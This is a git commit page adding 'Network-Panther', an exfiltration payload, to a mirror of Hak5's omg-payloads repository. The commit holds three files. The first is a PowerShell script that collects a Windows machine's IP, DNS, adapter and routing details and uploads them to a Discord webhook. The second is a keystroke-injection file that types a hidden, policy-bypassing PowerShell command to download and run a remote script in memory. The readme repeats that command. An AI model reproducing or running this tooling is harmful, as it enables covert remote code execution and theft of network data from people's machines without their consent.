hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #215 from atomiczsec/master 

New Payload - Network Panther
pull/227/head
Kalani Helekunihi 2024-05-24 15:03:03 -04:00 committed by GitHub
parent aa1bb0336a 723f290618
commit 71649bea5a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 163 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
payloads/library/exfiltration/Network-Panther/n.ps1 Normal file
View File

@ -0,0 +1,63 @@
# n.ps1
# This script will display the network configuration details on the console and also save them to a file in the same directory, then send to a discord webhook.
function Send-ToDiscord {
param (
[Parameter(Mandatory=$true)]
[string]$filePath,
[Parameter(Mandatory=$true)]
[string]$hookUrl
)
$message = @{
username = $env:USERNAME
content = "Uploading network configuration details"
}
# Send message
Invoke-RestMethod -Uri $hookUrl -Method Post -ContentType 'Application/Json' -Body ($message | ConvertTo-Json)
# Upload the file
curl.exe -F "file1=@$filePath" $hookUrl
}
# Specify the Discord webhook URL here
$discordWebhookUrl = 'YOUR_DISCORD_WEBHOOK_URL'
function Get-NetworkDetails {
$output = @()
$output += "IP Configuration:`n"
$output += Get-NetIPConfiguration | Out-String -Width 4096
$output += "`nDNS Client Settings:`n"
$output += Get-DnsClient | Out-String -Width 4096
$output += "`nDNS Server Addresses:`n"
$output += Get-DnsClientServerAddress | Out-String -Width 4096
$output += "`nNetwork Interface Details:`n"
$output += Get-NetAdapter | Format-Table Name, Status, MacAddress, LinkSpeed -AutoSize | Out-String -Width 4096
$output += "`nRouting Table:`n"
$output += Get-NetRoute | Format-Table DestinationPrefix, NextHop, RouteMetric, ifIndex -AutoSize | Out-String -Width 4096
return $output
}
# Get the network details
$networkDetails = Get-NetworkDetails
# Save to temp file
$tempFile = [IO.Path]::GetTempFileName() + ".txt"
$networkDetails | Out-File $tempFile
# Send to Discord
Send-ToDiscord -filePath $tempFile -hookUrl $discordWebhookUrl
Remove-Item $tempFile

14
payloads/library/exfiltration/Network-Panther/payload.txt Normal file
View File

@ -0,0 +1,14 @@
REM Title: Network-Panther
REM Author: atomiczsec
REM Description: This script will display the network configuration details on the console and also save them to a file in the same directory, then send to a discord webhook.
DEFINE URL http://new-url.com/powershell.ps1
REM Target: Windows 10 or 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

86
payloads/library/exfiltration/Network-Panther/readme.md Normal file
View File

@ -0,0 +1,86 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Network+Panther!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Network-Panther
A payload to exfiltrate network configuration. Can be used to further attack a network in a pentest or gather information on targets.
## Description
This script will display the network configuration details on the console and also save them to a file in the same directory, then send to a discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>